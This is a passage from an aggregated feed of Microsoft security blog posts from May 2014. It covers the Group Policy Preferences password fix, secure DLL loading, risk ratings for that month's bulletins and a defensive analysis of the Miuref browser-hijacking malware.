src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/gpp.png" border="0" /></a></p> <p>In addition to the change in behavior, Microsoft is providing customers with two PowerShell scripts. The first script, Enum-SettingsWithCpassword, will search existing GPO&rsquo;s for use of the account password functionality. We urge companies to immediately run this script and delete vulnerable GPO&rsquo;s detected.</p> <p>The second script, Invoke-PasswordRoll, can be used to set local administrator passwords on remote systems (something that Group Policy Preferences is commonly used for). The script takes a list of usernames and computers, and uses PowerShell remoting to connect to each computer and change each specified usernames password to a randomized password. The username/password combinations will be written recorded in a file on disk (which is encrypted, but optionally can be stored in clear-text). Note that the script enforces randomized passwords to ensure the local accounts cannot be used in pass-the-hash attacks.</p> <p>You can find both scripts at <a href="http://support.microsoft.com/kb/2962486">http://support.microsoft.com/kb/2962486</a>.</p> <p>- Joe Bialek, MSRC engineering team</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3629593&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">ToolsAttack Surface Reduction Get security updates for May 2014http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/13/get-security-updates-for-may-2014.aspxTue, 13 May 2014 18:00:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10522825Eve Blakemore12http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10522825http://blogs.msdn.com/b/securitytipstalk/archive/2014/05/13/get-security-updates-for-may-2014.aspx#comments<p>Microsoft releases security updates on the second Tuesday of every month.</p> <p><strong><a href="http://windows.microsoft.com/en-us/windows-8/windows-update-faq">Skip the details and check for&nbsp;the latest updates.</a></strong></p> <p>This bulletin announces the release of security updates for&nbsp;Windows, Microsoft Office, and other programs.<strong><br /></strong></p> <ul> <li><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn how to get security updates automatically</a></li> <li><a href="http://technet.microsoft.com/en-us/security/bulletin/ms14-may">For IT Pros: Microsoft Security Bulletin Summary for May 2014</a></li> </ul> <p>To get more information about security updates and other privacy and security issues delivered to your email inbox,&nbsp;<a href="http://www.microsoft.com/security/resources/newsletter.aspx">sign up for our newsletter</a>.</p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10522825" width="1" height="1">updatesmalwaremonthly security updatesautomatic updatingAutomatic UpdatessecurityMicrosoft UpdateWindows Updateonline safetypatch Tuesdaycybersecuritycybersafetymalicious softwareMicrosoft Security Updates Released Today to Help Improve Securityhttp://blogs.technet.com/b/security/archive/2014/05/13/security-updates-released-today-to-help-improve-security.aspxTue, 13 May 2014 17:54:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:b79f9792-88d7-4366-97e2-06aa1404bdf3Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3629582http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3629582http://blogs.technet.com/b/security/archive/2014/05/13/security-updates-released-today-to-help-improve-security.aspx#comments<p style="text-align:left;">As part of its regularly scheduled security bulletin release, Microsoft <a href="/b/msrc/archive/2014/05/13/the-may-2014-security-updates.aspx">today issued security updates </a>to help protect customers. That said, product support for Windows XP ended last month, and is no longer supported.<br />&nbsp;<br />For more information, see the <a href="http://blogs.windows.com/windows/b/windowsexperience/archive/2014/05/13/windows-xp-pcs-no-longer-receiving-updates.aspx">Windows Experience Blog</a>.</p>...(<a href="http://blogs.technet.com/b/security/archive/2014/05/13/security-updates-released-today-to-help-improve-security.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3629582&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">security bulletin releaseSecurity Updates Load Library Safelyhttp://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspxTue, 13 May 2014 17:26:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:59432e89-b383-43b2-a5e1-e3dbcbbcea86SRD Blog Author0<p>Dynamically loading libraries in an application can lead to vulnerabilities if not secured properly. In this blog post we talk about loading a library using <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx()</a> API and make use of options to make it safe.</p> <p><b><span style="text-decoration:underline;">Know the defaults:</span></b></p> <ul> <li>The library file name passed to <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684175(v=vs.85).aspx">LoadLibrary()</a> / <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx()</a> call need not contain an extension. If one is not specified, then the default library file extension, .DLL, is used. As a result of this feature, if a null is passed as library name it tries to load &quot;.DLL&quot; which could be exploited by placing a &quot;.DLL&quot; in the path searched.</li> <li>The library file name passed to <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684175(v=vs.85).aspx">LoadLibrary() </a>/ <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx() </a>call need not specify a directory path. If one is specified, library is loaded only from the specified path. Otherwise, following default DLL search order is used:</li> </ul> <ol> <li style="margin-left:30px;">The current process image file directory, application directory.</li> <li style="margin-left:30px;">The system directory.</li> <li style="margin-left:30px;">The 16 bit system directory.</li> <li style="margin-left:30px;">The windows directory.</li> <li style="margin-left:30px;">The current working directory.</li> <li style="margin-left:30px;">The directories listed in the PATH environment variable.</li> </ol> <ul> <li>Windows maintain a list known DLLs, which are basically a set of system DLLs, that are always guaranteed to load from the system directory when absolute name is specified.</li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682583(v=vs.85).aspx">DllMain()</a> function within the loaded library is called after loading the library into memory.</li> </ul> <p><b><span style="text-decoration:underline;">Control the DLL search order:</span></b></p> <p>There are various option to modify the order in which the loading library is searched other than the default search order when absolute name is provided.</p> <p>Some of the APIs that can influence the DLL search order/path by the <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx()</a> are as below:</p> <ul> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms686203(v=vs.85).aspx">SetDllDirectory()</a> : Adds a directory to the search path used to locate DLLs for the application</li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/hh310515(v=vs.85).aspx">SetDefaultDllDirectories()</a> : Adds a directory to the process DLL search path</li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/hh310513(v=vs.85).aspx">AddDllDirectory()</a> : Adds a directory to the process DLL search path</li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/hh310514(v=vs.85).aspx">RemoveDllDirectory() </a>: Removes a directory that was added to the process DLL search path by using <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/hh310513(v=vs.85).aspx">AddDllDirectory()</a></li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa365527(v=vs.85).aspx">SearchPath()</a> : Searches for a specified file in a specified path</li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/dd266735(v=vs.85).aspx">SetSearchPathMode()</a> : Sets the per-process mode that the <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa365527(v=vs.85).aspx">SearchPath()</a> function uses when locating files</li> <li><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/aa365530(v=vs.85).aspx">SetCurrentDirectory()</a> : Changes the current directory for the current process</li> <li><a href="http://msdn.microsoft.com/en-us/library/system.runtime.interopservices.defaultdllimportsearchpathsattribute(v=vs.110).aspx">DefaultDllImportSearchPathsAttribute </a>: For managed application use this attribute to specify the paths used to search the DLLs during platform invokes</li> </ul> <p><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx()</a> provide many flags that can be used to alter the default search order. Below table lists most of the flags and also depicts the DLL search order that is followed for each of them. Some of the options even consider the paths set with above mentioned APIs.</p> <p style="margin-left:30px;"><i>&nbsp;</i><i><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/loadlibraryex.png"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/loadlibraryex.png" border="0" /></a></i><i><br />Table 1: Depicting different options to the LoadLibraryEx and how it affects the DLL search order.</i><i>&nbsp;</i></p> <p><b><span style="text-decoration:underline;">Loading library as non-executable:</span></b><br />It is not always required to load a library as an executable image. <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms684179(v=vs.85).aspx">LoadLibraryEx()</a> makes it possible to load a library as a data file, or an image resource, for example. For this purpose, it supports following different options:</p> <ul> <li>LOAD_LIBRARY_AS_DATAFILE</li> <li>LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE</li> <li>LOAD_LIBRARY_AS_IMAGE_RESOURCE</li> <li>DONT_RESOLVE_DLL_REFERENCES</li> </ul> <p>These options helps in treating a file as a normal data file rather as an executable module. Loading with this option doesn&#39;t call DLLMain() and none of the memory space of the loaded DLL data is marked as executable.</p> <p><b><span style="text-decoration:underline;">Blocking the library from loading:</span></b><br />Sometimes it might be required to block a library or block an illegitimate library from loading into an application. Check out following facilities to aid that:</p> <ul> <li><a href="http://technet.microsoft.com/en-us/library/dd723678.aspx">AppLocker </a>:</li> </ul> <ul> <li style="list-style-type:none;"> <ul> <li><a href="http://technet.microsoft.com/en-us/library/dd723678.aspx">AppLocker </a>is a policy based mechanism to block DLLs from loading into applications. These policies can be pushed via group policy. <a href="http://technet.microsoft.com/en-us/library/dd723678.aspx">AppLocker </a>can control executables, scripts and installers.</li> <li>When a new DLL loads, a notification is sent to AppLocker to verify that the DLL is allowed to load. AppLocker calls the Application Identity component to calculate the file attributes. It duplicates the existing process token and replaces those Application Identity attributes in the duplicated token with attributes of the loaded DLL. AppLocker then evaluates the policy for this DLL, and the duplicated token is discarded. Depending on the result of this check, the system either continues to load the DLL or stops the process.</li> <li>AppLocker can block the DLL based on path, publisher or file hash.</li> </ul> </li> </ul> <ul> <li><a href="http://msdn.microsoft.com/en-us/windows/desktop/aa380259(v=vs.85)#introduction_to_code_signing">Code Signing</a></li> </ul> <ul> <li style="list-style-type:none;"> <ul> <li>Microsoft Authenticode technology can be used to sign the DLL, which is to attach digital signatures to the DLL to guarantee its authenticity and integrity.</li> </ul> </li> </ul> <p>To summarize our discussion:</p> <p><b><span style="text-decoration:underline;">To ensure secure loading of libraries</span></b></p> <ul> <li>Use proper DLL search order.</li> <li>Always specify the fully qualified path when the library location is constant.</li> <li>Load as data file when required.</li> <li>Make use of code signing infrastructure or AppLocker.</li> </ul> <p><b><span style="text-decoration:underline;">Some common attack vectors we see:</span></b></p> <ul> <li>Application directory attacks, especially from the temporary internet or download folder perspective. Particularly when the application is an installer, it is a common thing for people to download the installer into default directory and execute from there. Considering attacker can drop malicious file in the default directory can make use of application directory to load the DLLs.&nbsp;Manifest and <a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682600(v=vs.85).aspx">.local redirection</a> can also be used in this scenario.</li> <li>Loading DLL from memory and also Powershell DLL injection. Which can be used by malwares to keep the loading of a malicious DLL from getting detected.</li> <li>TOCTOU attacks when loading library from remote location.</li> </ul> <p>- Swamy Shivaganga Nagaraju, MSRC engineering team</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3629509&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1"> Assessing risk for the May 2014 security updates http://blogs.technet.com/b/srd/archive/2014/05/13/assessing-risk-for-the-may-2014-security-updates.aspxTue, 13 May 2014 17:12:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:569017c5-04fb-46f2-85ff-1fa9cd9e35fcSRD Blog Author0<p>Today we released eight security bulletins addressing 13 unique CVE&rsquo;s. Two bulletins have a maximum severity rating of Critical while the other six have a maximum severity rating of Important. The table is designed to help you prioritize the deployment of updates appropriately for your environment.</p> <table border="1"> <tbody> <tr> <td><b>Bulletin</b></td> <td><b>Most likely attack vector</b></td> <td><b>Max Bulletin Severity</b></td> <td><b>Max exploit-ability</b></td> <td><b>Likely first 30 days impact</b></td> <td><b>Platform mitigations and key notes</b></td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-029.aspx">MS14-029</a> <p>(Internet Explorer)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to continue to see exploits leveraging CVE-2014-1815.</td> <td>This update includes the fix for CVE-2014-1776, first addressed by the MS14-021 out-of-band security update on May 1. However, MS14-029 is not a cumulative security update. Please first install the last cumulative security update for Internet Explorer before applying this update.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-024.aspx">MS14-024</a> <p>(Common Controls - MSCOMCTL)</p> </td> <td>Victim opens malicious RTF document</td> <td>Important</td> <td>n/a</td> <td>Security Feature Bypass only. Not likely to be exploited directly for code execution.</td> <td>This vulnerability has been leveraged as the ASLR bypass for in-the-wild exploits leveraging the following CVE&rsquo;s: <ul> <li>CVE-2012-0158</li> <li>CVE-2012-1856</li> <li>CVE-2013-3906</li> <li>CVE-2014-1761</li> </ul> <p>Installing this update will prevent this control from being used as an ASLR bypass in any potential future exploits.</p> </td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-025.aspx">MS14-025</a> <p>(Group Policy Preferences)</p> </td> <td>Attacker having already compromised a domain-joined workstation leverages that access to query Group Policy Preferences to potentially discover obfuscated domain account credentials.</td> <td>Important</td> <td>1</td> <td>Likely to continue seeing attackers use this &ldquo;post-exploitation&rdquo; technique to move laterally across enterprise network.</td> <td>Security update prevents the feature from being used in the future but requires administrators to take action to remove passwords previously stored and still available. This issue and the methods for preventing its abuse are described in more detail at <a href="http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx">this SRD blog post</a>.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-027.aspx">MS14-027</a> <p>(Shell)</p> </td> <td>Attacker already running code on a machine as low privilege user takes advantage of elevated/high privileged process calling ShellExecute to elevate the low privileged process.</td> <td>Important</td> <td>1</td> <td>Discovered in use by limited number of commodity malware samples. Likely to continue seeing malware attempt to leverage this vulnerability to escalate from low privilege to higher privilege.</td> <td>Observed in the following malware families, each of which is already blocked by Microsoft anti-malware products: <p>Backdoor:Win32/Koceg<br /> Backdoor:Win32/Optixpro.T<br /> Backdoor:Win32/Small<br /> Backdoor:Win32/Xtrat<br /> PWS:Win32/Zbot<br /> Rogue:Win32/Elepater<br /> Rogue:Win32/FakeRean<br /> Trojan:Win32/Dynamer!dtc<br /> Trojan:Win32/Malagent<br /> Trojan:Win32/Malex.gen<br /> Trojan:Win32/Meredrop<br /> Trojan:Win32/Otran<br /> Trojan:Win32/Rimod<br /> Trojan:Win32/Sisron<br /> TrojanDropper:Win32/Sirefef<br /> TrojanSpy:Win32/Juzkapy<br /> VirTool:MSIL/Injector<br /> VirTool:Win32/Obfuscator<br /> Virus:Win32/Neshta<br /> Worm:Win32/Autorun<br /> Worm:Win32/Fasong<br /> Worm:Win32/Ludbaruma<br /> Worm:Win32/Rahiwi</p> </td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-022.aspx">MS14-022</a> <p>(SharePoint)</p> </td> <td>Attacker able to upload arbitrary content to SharePoint server could potentially run code in the context of the SharePoint service account.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploit emerge in next 30 days.</td> <td>Attacker must be granted access to upload content to SharePoint server to trigger vulnerability. We haven&rsquo;t typically seen this type of vulnerability widely exploited, despite its exploitable nature.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-023.aspx">MS14-023</a> <p>(Office)</p> </td> <td>Attacker tricks victim into authenticating to Microsoft online service in such a way that authentication token can be captured and replayed by attacker.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploit emerge in next 30 days.</td> <td>In addition to token replay vulnerability, this update also addresses a DLL preloading issue involving the Chinese grammar checker DLL. We&rsquo;ve recently developed and posted updated documentation covering the best way to protect applications from this type of attack. You find that guidance in <a href="http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx">this blog post</a>.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-026.aspx">MS14-026</a> <p>(.NET Framework)</p> </td> <td>Custom application developed leveraging the .NET Remoting feature could grant attack code execution access in response to specially crafted data.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploit emerge in next 30 days.</td> <td>.NET Remoting feature used very rarely, and primarily only with applications written based on .NET Framework version 2.</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-028.aspx">MS14-028</a> <p>(iSCSI)</p> </td> <td>Attacker able to reach iSCSI endpoint can potential cause persistent resource exhaustion denial-of-service attack on Windows host.</td> <td>Important</td> <td>3</td> <td>Denial of service only. No chance for direct code execution.</td> <td>&nbsp;</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC engineering team</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3629506&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">MitigationsAttack VectorRisk Asessment The May 2014 Security Updateshttp://blogs.technet.com/b/msrc/archive/2014/05/13/the-may-2014-security-updates.aspxTue, 13 May 2014 17:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:9a5b06c6-8aad-47bc-8f2a-908ac8870a29Dustin C. Childs0<p>Today, we released <a href="https://technet.microsoft.com/library/security/ms14-may"><span style="color:#0000ff;">eight security bulletins</span></a> &ndash; two rated Critical and six rated Important &ndash; to address 13 Common Vulnerability &amp; Exposures (CVEs) in .NET Framework, Office, SharePoint, Internet Explorer, and Windows. We encourage you to apply all of these updates, but for those who need to prioritize their deployment planning, we recommend focusing on <a href="http://technet.microsoft.com/security/bulletin/ms14-024"><span style="color:#0000ff;font-family:Calibri;">MS14-024</span></a>, <a href="http://technet.microsoft.com/security/bulletin/ms14-025"><span style="color:#0000ff;font-family:Calibri;">MS14-025</span></a> and <a href="http://technet.microsoft.com/security/bulletin/ms14-029"><span style="color:#0000ff;font-family:Calibri;">MS14-029</span></a>.</p> <p>We also have some new security advisories releasing today. <a href="https://technet.microsoft.com/library/security/2871997"><span style="color:#0000ff;">Security Advisory 2871997</span></a> provides an update for Windows 8 and Windows Server 2012 that enhances credential protection and domain authentication controls to reduce credential theft by making specific improvements. These features are currently available in Windows 8.1 and Windows Server 2012 R2, and we are making them available for other platforms.</p> <p>The .NET Framework update provided by <a href="https://technet.microsoft.com/library/security/2960358"><span style="color:#0000ff;">Security Advisory 2960358</span></a> disables Rivest Cipher 4 (RC4) in Transport Layer Security (TLS). This is similar to what we did with <a href="https://technet.microsoft.com/library/security/2868725"><span style="color:#0000ff;">Security Advisory 2868725</span></a> back in November, 2013. The only difference here is this month&rsquo;s advisory is specific to the .NET Framework.</p> <p>The last of the new advisories is <a href="https://technet.microsoft.com/library/security/2962824"><span style="color:#0000ff;">Security Advisory 2962824</span></a>. This update revokes the digital signature for a specific Unified Extensible Firmware Interface (UEFI) module. &nbsp;Although we are not currently aware of any customer impact, we&rsquo;re taking this step out of an abundance of caution as a part of our ongoing efforts to provide the best customer protections available. If you are not running a system that supports UEFI Secure Boot or you have it disabled, there is no risk, and no action for you to take.</p> <p>Finally, we are revising <a href="http://technet.microsoft.com/security/advisory/2755801"><span style="color:#0000ff;">Security Advisory 2755801</span></a> with the latest update for Adobe Flash Player in Internet Explorer. The update addresses the vulnerabilities described in Adobe Security bulletin APSB14-14. For more information about this update, including download links, see <a href="http://msdn.microsoft.com/2957151"><span style="color:#0000ff;">Microsoft Knowledge Base Article 2957151.</span></a></p> <p>For those wondering, Windows XP will not be receiving any security updates today. For some time we have been recommending customers move to a modern operating system like Windows 7 or Windows 8.1 to help stay safe, and now is a great time to make that move. For more information, see the <a href="http://blogs.windows.com/windows/b/windowsexperience/"><span style="color:#0000ff;">Windows Experience Blog</span></a>.</p> <p>For more information about this month&rsquo;s security updates, including the detailed view of the Exploit Index broken down by each CVE, visit the <a href="https://technet.microsoft.com/library/security/ms14-may"><span style="color:#0000ff;">Microsoft Bulletin Summary Web page</span></a>. If you are not familiar with how we calculate the Exploit Index (XI), a full description is found <a href="http://technet.microsoft.com/en-us/security/cc998259.aspx"><span style="color:#0000ff;">here</span></a>.</p> <p>Jonathan Ness and I will host the monthly bulletin webcast, scheduled for Wednesday, May 14, 2014, at 11 a.m. PDT. I invite you to <a title="register here" href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572979&amp;Culture=en-US"><span style="color:#0000ff;">register here</span></a> and tune in to learn more about this month&rsquo;s security bulletins and advisories.</p> <p>For all the latest information, you can also follow the MSRC team on Twitter at <a title="@MSFTSecResponse" href="http://www.twitter.com/msftsecresponse"><span style="color:#0000ff;">@MSFTSecResponse</span></a>.</p> <p>Thanks, <br /> <a title="Dustin Childs" href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0000ff;">Dustin Childs</span></a> <br /> Group Manager, Response Communications <br /> Microsoft Trustworthy Computing</p> <p></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3629578&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsSecurity BulletinSecurity Advisory.NET FrameworkInternet Explorer (IE)Microsoft Office MSRT May 2014 - Miuref http://blogs.technet.com/b/mmpc/archive/2014/05/13/msrt-may-2014-miuref.aspxTue, 13 May 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:095bbb9e-40d2-4f04-909a-9316b6601d1amsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/05/13/msrt-may-2014-miuref.aspx#comments<div class="ExternalClass6A72656E668A418E9CA180A7EFB05C7A"> <p class="ExternalClass53F4BCD82C4C4E2FA82FF1CDEC42792B">​Two new families were added to the <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Microsoft Malicious Software Removal Tool</a> (MSRT) this month: <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Filcout">Win32/Filcout</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Miuref">Win32/Miuref</a>.</p> <p class="ExternalClass53F4BCD82C4C4E2FA82FF1CDEC42792B">We first detected Filcout in April 2014 after we observed it installing variants of <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Sefnit">Win32/Sefnit</a>. We first detected Miuref in December 2013.&nbsp;This blog will discuss Miuref, a browser hijacker that can perform click fraud and hijack search results.</p> <p class="ExternalClass53F4BCD82C4C4E2FA82FF1CDEC42792B">The family&nbsp;has a number of means of getting itself onto a user&rsquo;s computer. It can be installed via an exploit such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=JS/Fiexp">JS/Fiexp</a>, distributed via spam emails, use social engineering in an attempt to trick users into running its installer, or be downloaded and run by other malware such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Fareit">Win32/Fareit</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:Win32/Onkods"> <span class="ms-rteThemeBackColor-1-0">Win32/Onkods.</span></a></p> <p class="ExternalClass53F4BCD82C4C4E2FA82FF1CDEC42792B">It is generally distributed packaged in a Nullsoft installer, which is a commercially available scripted installer that is normally used to install legitimate software. In this case, the installer extracts and runs an executable file with a variable file name. It also extracts one or two data files. One of these data files is named <em>setup.dat</em>. The other data file, if it is present, can have one of the following file names:</p> <div class="ExternalClass53F4BCD82C4C4E2FA82FF1CDEC42792B"> <ul> <li> <div><em>a</em></div> </li> <li> <div><em>a.dat</em></div> </li> <li> <div><em>b</em></div> </li> <li> <div><em>c</em></div> </li> <li> <div><em>d</em></div> </li> <li> <div><em>data.dat</em></div> </li> <li> <div><em>nk</em></div> </li> <li> <div><em>ns21.dat</em></div> </li> <li> <div><em>padding.txt</em></div> </li> <li> <div><em>rs.dat</em></div> </li> </ul> </div> <p><em>Setup.dat</em> contains a DLL that has been compressed with aPLib and encrypted with RC4. The main function of the executable file is to decrypt and decompress the DLL and manually load it into memory. This requires the following steps to ensure the DLL code&nbsp;executes correctly:</p> <ul> <li>Patching the locations of jumps and call instructions within the DLL with the correct value.</li> <li>Loading each section of the DLL into memory.</li> <li>Changing the read, write, and execute permissions of the memory containing the DLL copy to match those of each corresponding section of the DLL.</li> <li>Parsing the DLL&rsquo;s import table, and using LoadLibrary and GetProcAddress calls to dynamically import the functions that would normally be statically imported by the DLL.</li> <li>Making a call to the DllMain routine of the DLL, followed by a call to the DllRegisterServer function that it exports.</li> </ul> <p>These steps are normally performed by calling the <em>kernel32.dll </em>LoadLibrary function, which, when given the filename of a DLL, will load it into memory. By loading the DLL into memory manually, instead of using a LoadLibrary call, the malware is able to execute the DLL&rsquo;s payload without needing to write a decrypted copy to disk. This might be an attempt to avoid detection by antimalware products.</p> <p>The DLL component sends details of the affected system to a remote server, including the computer name, machine GUID, and hard disk serial number. If Chrome or Firefox are present, it can install extensions for these browsers. These extensions, which we detect as <span class="ms-rteThemeBackColor-1-0"> <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:JS/Miuref.A">Trojan:JS/Miuref.A</a></span> for the Firefox extension and <span class="ms-rteThemeBackColor-1-0"> <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:JS/Miuref.B">Trojan:JS/Miuref.B</a></span> for the Chrome extension, can redirect web searches to pages controlled by the attacker. For Internet Explorer the redirection is done by injecting code into the Internet Explorer process and obtaining the redirection URLs from a remote server. The malware can also perform click fraud by running additional hidden Internet Explorer processes and sending clicks to online advertisements that appear to come from the pages controlled by the attacker.</p> <p>Miuref also appears to have mechanisms to allow it to update itself, or to download and run other malware.</p> <p>As usual, there are a number of steps you can take to help protect your computer from Miuref and other malware and potentially unwanted software:</p> <ul> <li><a href="http://www.microsoft.com/security/portal/mmpc/help/updateFAQs.aspx">Keep your software up to date</a>, especially Java, Adobe Reader and Flash, and Windows and other Microsoft products.</li> <li>Use caution when opening attachments or links in emails or instant messages, especially if they are suspicious or unexpected.</li> <li>Run an up-to-date real time antimalware product, such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>, or, if you are running Windows 8, ensure that <a href="http://www.microsoft.com/security/pc-security/windows-defender.aspx">Windows Defender</a> is active.</li> </ul> <p><em>David Wood</em></p> <p><em>MMPC</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3629246&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Security Trends in Cloud Computing Part 3: Retail sectorhttp://blogs.technet.com/b/trustworthycomputing/archive/2014/05/13/security-trends-in-cloud-computing-part-3-retail-sector.aspxTue, 13 May 2014 15:57:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:a9c1a26b-0a93-42e6-9616-c120747022ddTrusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>Previously in this series, we looked at cloud security trends in the <a href="/b/trustworthycomputing/archive/2014/04/29/security-trends-in-cloud-computing-part-1-financial-services.aspx" target="_blank">financial services</a> and <a href="/b/trustworthycomputing/archive/2014/05/01/security-trends-in-cloud-computing-part-2-addressing-data-challenges-in-healthcare.aspx" target="_blank">healthcare </a>sectors, based on survey data derived from Microsoft&rsquo;s <a href="https://roianalyst.alinean.com/msft/AutoLogin.do?d=563612287085088525" target="_blank">Cloud Security Readiness Tool</a> (CSRT). Next I&rsquo;d like to discuss some findings that relate to the retail industry.&nbsp; <a href="/b/trustworthycomputing/archive/2014/05/12/security-trends-in-cloud-computing-part-3-retail-sector.aspx" target="_blank">Read more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/05/13/security-trends-in-cloud-computing-part-3-retail-sector.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3629502&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">cloud securityAdrienne HallCloudReliabilityTrustTechnologycloud trust studySecurityCloud Computingresearchcloud servicesTrustworthy ComputingMicrosoftDataPrivacyMicrosoft Cloud Solutions Meet Ryan Asdourian: Microsoft Promoter; Seahawks Mascot; and MS Ambassadorhttp://blogs.msdn.com/b/accessibility/archive/2014/05/13/meet-ryan-asdourian-microsoft-promoter-seahawks-mascot-and-ms-ambassador.aspxTue, 13 May 2014 15:35:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10524714Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10524714http://blogs.msdn.com/b/accessibility/archive/2014/05/13/meet-ryan-asdourian-microsoft-promoter-seahawks-mascot-and-ms-ambassador.aspx#commentsRyan Asdourian stays busy. He travels the world promoting Microsoft products in high-tech demonstrations. When he is back in Seattle he puts on a different type of show as the Seahawks mascot Blitz. Then five years ago, the busy tech showman decided...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/05/13/meet-ryan-asdourian-microsoft-promoter-seahawks-mascot-and-ms-ambassador.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10524714" width="1" height="1"> Advance Notification Service for the May 2014 Security Bulletin Releasehttp://blogs.technet.com/b/msrc/archive/2014/05/08/advance-notification-service-for-the-may-2014-security-bulletin-release.aspxThu, 08 May 2014 19:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:76bb61ee-bbfc-48e6-b122-0c8843e7a3adDustin C. Childs0<p>Today we provide Advance Notification Service 